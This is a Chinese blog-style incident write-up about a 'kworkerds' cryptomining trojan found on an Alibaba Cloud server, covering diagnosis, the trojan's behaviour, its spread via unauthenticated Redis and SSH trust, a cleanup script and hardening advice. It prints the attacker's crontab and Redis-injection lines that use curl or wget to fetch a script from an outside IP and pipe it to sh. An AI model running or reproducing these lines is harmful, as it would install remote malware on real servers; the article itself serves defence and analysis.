您当前的位置:首页 > 电脑百科 > 安全防护 > 服务器/网站

阿里云被植入挖矿木马事件

时间:2019-07-05 15:03:26  来源:  作者:

很多朋友都在使用阿里云,但遇到过阿里云被植入木马的情况么?小编今天就遇到了。阿里云有自己的安全机制,一般情况下不会有什么问题,那木马又是被怎么植入的呢?今天为您解析。

起因

今天,同事说我负责的模块在阿里云上不工作了,我赶忙远程登录查看。

服务器的症状

1、敲命令的时候,终端的字符回传很快,但是命令的响应时间较长;

2、服务器内存32GB,剩余200MB;

3、CPU跑到了99%;

4、我负责的模块之前一直工作正常,稳定性好,没修改过配置,但现在不能工作;

5、查看我负责的模块配置正常、运行正常,但部分服务出错;

6、top命令未发现有高耗CPU的进程,但是有大量的kworkerds进程。

定位分析

病症1、3、6说明是阿里云服务器已经产生了异常。

根据病症4、5一步步梳理流程,核对日志,定位问题,最终发现,redis可以正常提供服务,但程序无法将数据刷新到redis,导致分别负责读写的两个模块数据长时间不能同步,重启redis后服务正常。但问题需要进一步分析。

查找木马

服务器是与别人共用的,其他的服务,我们不知道是否有用。但服务器卡顿,实在影响调试效率,搜索了一下kworkerds,才知道是个挖矿的木马程序。

查看木马进程数

1[root@xxx ~]# ps -ef | grep -v grep |grep kworkerds | wc -l

2385

kill掉所有木马进程

1[root@xxx ~] # ps auxf | grep -v grep | grep kworkerds | awk '{print $2}'| xargs kill-9

查看开机启动项和任务

1[root@XXX ~]# systemctl list-unit-files

2(没发现问题,就不贴进来了)

3[root@XXX ~] #cat /etc/rc.local

4(没发现问题,就不贴进来了)

5[root@XXX ~] #cat /etc/crontab

6...

701 * * * * root run-parts /etc/cron.hourly

802 4 * * * root run-parts /etc/cron.daily

90 1 * * * root /usr/ local/bin/DNS

10[root@XXX ~] #crontab -l

11*/23 * * * * (curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)|sh

“/etc/crontab”里的内容看起来好像是正常,但是“crontab -l”中显示的内容有些来路不明。

于是下载代码查看

1[root@xxx ~] # (curl -fsSL http://185.10.68.91/1/1||wget -q -O- http://185.10.68.91/1/1)

2(木马的代码我就不贴进来了)

限于篇幅,木马的代码就不展示在此了,大家可以自行下载查看,记住,下载的时候要把"|sh"去掉,当心玩火自焚。

分析木马

木马脚本写得还是不错的,风格整齐,逻辑严谨。出色地完成了以下功能:

1、删除阿里云云盾客户端和阿里云监控程序;

2、停止、删除主机已经存在的其他挖矿程序;

3、下载挖矿程序和配置文件并执行;

4、约束木马程序,防止触发服务器性能监测工具告警;

5、设置任务计划,保持更新,持续感染主机;

6、通过本机感染其他主机;

7、清空操作日志,篡改文件修改时间,隐藏自己的访问踪迹。

木马中同时用了shell和Python两种脚本,脚本逐层嵌套,对于一些敏感的代码,使用了base64进行加密,针对不同的系统平台有不同的处理,同时锁定了自己修改的文件,防止被别的程序随意修改,提供远程服务的IP地址来自非洲东部的塞舌尔共和国。

木马是如何传播的传播方式

木马传播方式有三种,如下:

1、activeMQ

2、redis

3、ssh的免密码登录

传播思路

木马感染的步骤如下:

1、通过扫描"xxx.xxx.0.0/16"网段内的所有IP的6379和8186两个端口;

2、如果可以连接,那么以key-value的形式写入数据;

1'set SwE3SC "tn*/10 * * * * root (curl -fsSL http://185.10.68.91/raw/68VYMp5T||wget -q -O- http://185.10.68.91/raw/68VYMp5T)|shnt"

'

3、将该条数据以文件的形式保存到定时任务的文件目录,如/var/spool/cron/root等;

4、下个定时周期到来时,服务器自动下载远程脚本并执行;

5、遍历该主机可以免密码登录的其他主机,远程连接并执行代码。

远程脚本执行时,会重新修改定时任务等文件,保证可以持续感染主机,同时也隐藏了第一次感染的痕迹。之后每个定时周期到来时,都会重复4、5两个步骤。

排查漏洞

服务器中没有activeMQ,没有.ssh文件夹。小编也根据代码流程,感染了一下自己的redis,但是并没有达到预期的结果。

本人用的redis文件保存的时候是二进制的,不是字符串,根本无法被定时任务执行,但是修改感染脚本,可以完成黑客设置的既定思路。

结合阿里云之前修改过密码的情况,本次感染可能有两种来源:

1、以前发现了被感染,但木马没有被清理干净;

2、木马作者会定期修改自己的代码来感染不同版本的redis,甚至是去利用其它软件的漏洞。

另外一个代码变动的证据就是netstat命令的二进制文件遭到篡改,这显然是为了应对运维人员排查异常网络连接而设计的,但本次检查木马代码时,并没有发现与netstat命令有关的操作。

清理木马

清理过程分两步:删除木马文件和修补当前漏洞。

删除木马文件

根据木马的代码,写了清理脚本,如下:

1#!/bin/bash

2ps auxf | grep -v grep | grep kworkerds | awk '{print $2}'| xargs kill-9

3

4chattr -i /usr/ local/bin/dns /etc/cron.d/root /etc/cron.d/Apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/ld.so.preload

5echo""> /usr/ local/bin/dns

6echo""> /etc/cron.d/root

7echo""> /etc/cron.d/apache

8echo""> /var/spool/cron/root

9echo""> /var/spool/cron/crontabs/root

10rm -rf /etc/cron.hourly/oanacroner

11rm -rf /etc/cron.daily/oanacroner

12rm -rf /etc/cron.monthly/oanacroner

13

14sed -i '/cron.hourly/d'/etc/crontab

15sed -i '/cron.daily/d'/etc/crontab

16sed -i '/usr/local/bin/dns/d'/etc/crontab

17

18#sed -i '$d' /etc/ld.so.preload

19rm -rf /usr/ local/lib/libntpd.so

20

21#/tmp/.a可以不删,木马是通过此文件判断是否要卸载阿里云盾

22#rm -rf /tmp/.a

23rm -rf /bin/kworkerds

24rm -rf /tmp/kworkerds

25rm -rf /usr/sbin/kworkerds

26rm -rf /etc/init.d/kworker

27chkconfig --del kworker

脚本仅供大家参考,在执行之前还是要对照一下具体的环境。

除此之外,还需要排查一下系统中是否有异常用户,异常的服务和异常的监听端口。毕竟服务器被入侵过,绝不能等闲视之。

修补漏洞

以redis为例,修补漏洞有很多种方法:

1、限制端口,使其对外不可连接;

2、不要使用root运行reids;

3、及时更新软件,修补漏洞;

4、修改默认端口;

6。对重要命令重命名;

。。。

关于这个问题,阿里云也有详细的安全加固方案:

https://help.aliyun.com/knowledge_detail/37447.html

编者的话

黑客一词听起来感觉酷酷的,因为世界上确有一批崇尚用技术实现“开放、自由、真实、平等、美好生活”的人,他们离经叛道,闪闪发光。然而,通常情况下非法获取利益的黑客仅仅是一个小偷而已,喜欢的是不劳而获,而不是技术本身,技术水平也只能是一般。

希望大家从技术交流,防范风险的角度看待文中提供的木马资料,不要走上违法犯罪的道路。从另一个角度讲,信息安全无小事,文中的木马仅仅是挖矿,事实上,该漏洞足以让黑客在你的服务器上做任何事,大家万万不可掉以轻心。



Tags:阿里云   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
阿里云镜像源地址及安装网站地址https://developer.aliyun.com/mirror/centos?spm=a2c6h.13651102.0.0.3e221b111kK44P更新源之前把之前的国外的镜像先备份一下 切换到yumcd...【详细内容】
2021-12-27  Tags: 阿里云  点击:(1)  评论:(0)  加入收藏
阿里云和腾讯云都是非常好的云服务器平台,大多数用户完全不用纠结腾讯云还是阿里云,特别是微信开发用户,自然是首选腾讯云,其次是学生或个人以及财政紧张的小公司微型业务,腾讯云...【详细内容】
2021-12-14  Tags: 阿里云  点击:(14)  评论:(0)  加入收藏
本文作者宗志刚(花名瑄珉),网络领域从业十五余年,现任阿里云网络产品线资深技术专家,负责阿里云网络洛神平台的技术规划、架构设计以及网元产品研发工作。在刚刚过去的云栖大会上...【详细内容】
2021-11-02  Tags: 阿里云  点击:(98)  评论:(0)  加入收藏
Windows电脑将阿里云盘挂载为本地磁盘,全速访问资源,本篇文章依赖于阿里云盘的webdav功能,如果没有搭建的童鞋可以先搭建好webdav搭建阿里云盘webdav的文章群晖NAS同步阿里云盘...【详细内容】
2021-08-09  Tags: 阿里云  点击:(686)  评论:(0)  加入收藏
关于阿里云ACP认证,其实涉及了很多方向。今年在阿里云合作伙伴大会上,阿里将认证这个板块分为了计算和数据智能两大类,细分又可以分为云计算、云原生、云安全、大数据、数据库...【详细内容】
2021-07-16  Tags: 阿里云  点击:(152)  评论:(0)  加入收藏
近日有粉丝问阿里云和华为云的部署区别是啥,其实阿祥没有搭建过阿里云,具体用啥工具部署,部署的步骤和具体方法并不知道(ps:后续如果能找到类似资料,阿祥会给大家分享),所以我这次先...【详细内容】
2021-07-13  Tags: 阿里云  点击:(136)  评论:(0)  加入收藏
一、对象存储OSS阿里云对象存储OSS(Object Storage Service)具有丰富的安全防护能力,支持服务器端加密、客户端加密、防盗链白名单、细粒度权限管控、日志审计、合规保留策略(WO...【详细内容】
2021-06-24  Tags: 阿里云  点击:(102)  评论:(0)  加入收藏
视频点播(ApsaraVideo for VoD)是集音视频采集、编辑、上传、自动化转码处理、媒体资源管理、分发加速于一体的一站式音视频点播解决方案。 1、应用场景 音视频网站:无论是初创...【详细内容】
2021-06-23  Tags: 阿里云  点击:(142)  评论:(0)  加入收藏
阿里云Tair云原生内存数据库线上名字为阿里云数据库Redis企业版(又称阿里云Tair),从2009年开始正式承载集团业务,是一款历经磨练的企业级产品。它完全兼容Redis的数据结构和通讯协议,包括API接口,并且在内部逐步打磨的过程...【详细内容】
2021-06-21  Tags: 阿里云  点击:(99)  评论:(0)  加入收藏
1.ubuntu 20.04 LTS 更换阿里云源第一步:先备份下原始源:sudo cp /etc/apt/source.list /etc/apt/source.list.backup第二步:修改文件vim /etc/apt/source.list清除原有的,替换...【详细内容】
2021-06-07  Tags: 阿里云  点击:(100)  评论:(0)  加入收藏
▌简易百科推荐
在最近的一波攻击中,黑客利用多个插件中未修补的漏洞攻击了 160 万个 WordPress 网站。 易受攻击的插件对 WordPress 网站产生了的巨大攻击数据。 Wordfence 最近发现 WordPr...【详细内容】
2021-12-16  蚁安    Tags:WordPress   点击:(9)  评论:(0)  加入收藏
事件起因从安全分析系统里面发现一条带有病毒的下载,然后针对这条记录展开了一系列的分析分析过程1.登录到被感染服务器,查看系统状况,hadoop 这个用户在 2020/6/18 20:32 从这...【详细内容】
2021-11-23  Z2990Lig    Tags:SSH   点击:(32)  评论:(0)  加入收藏
1、除了服务器需要用的一些正规软件,其它都不要安装。2、在用户中把administrator改名,这样做的目的是即使对方暴破了我们的密码用户名也不容易猜住,相当于又加了一道关卡。...【详细内容】
2021-11-01  IT小哥吧    Tags:服务器   点击:(37)  评论:(0)  加入收藏
账户安全(1)更名administrator本地用户并禁用guest账户步骤:点击“开始”,找到“管理工具”,点击里面的“计算机管理”,找到“本地用户和组” (2)设定账户锁定策略尝试5次失败...【详细内容】
2021-10-12  Kali与编程  今日头条  Tags:Windows主机   点击:(62)  评论:(0)  加入收藏
本文主要介绍以Microsoft的Windows Server 2019 ,版本:Datacenter(Domain Controller)安全加固保护.企业随着规模不断扩大,业务增多,信息安全建设是企业里一条只有重点没有终点...【详细内容】
2021-09-17  Vireshark    Tags:服务器安全   点击:(64)  评论:(0)  加入收藏
目录常见共享命令IPC$IPC$的利用条件1:开启了139、445端口2:目标主机开启了IPC$共享3:IPC连接报错IPC空连接空连接可以做什么?(毫无作用)IPC$非空连接IPC$非空连接可以做什么?di...【详细内容】
2021-09-16  网络说安全    Tags:系统安全   点击:(86)  评论:(0)  加入收藏
昨天一个老哥找到我,说他的服务器这几天一直被CC攻击,问我这边有没有什么解决的方法? 近年来,网络攻击事件越来越频繁,最常见的就是CC攻击和DDOS攻击,主要的区别就是针对的对象不...【详细内容】
2021-09-10  小蚁GDRAGON    Tags:cc攻击   点击:(58)  评论:(0)  加入收藏
网站页面上的登录操作,通常都是输入帐号密码,传输至网站后台验证。在网站页面、数据传输中,通过技术手段,都可以得到用户输入的信息,并可以修改,从而发起网络攻击。典型的如:使用自...【详细内容】
2021-08-30  修丹道的程序猿    Tags:登录方式   点击:(62)  评论:(0)  加入收藏
网络安全研究人员披露了一类影响主要 DNS 即服务 (DNSaaS) 提供商的新漏洞,这些漏洞可能允许攻击者从企业网络中窃取敏感信息。基础设施安全公司 Wiz 的研究人员 Shir Tamar...【详细内容】
2021-08-12  零日时代    Tags:漏洞   点击:(66)  评论:(0)  加入收藏
001暴力破解1. 指定用户名爆破密码传统型爆破思路,用户名可以通过猜测或者信息收集获得。猜测:admin、网站域名等信息收集:新闻发布人、whoami等2. 指定密码爆破用户名如果是后...【详细内容】
2021-07-23  KaliMa  今日头条  Tags:登陆框   点击:(85)  评论:(0)  加入收藏
最新更新
栏目热门
栏目头条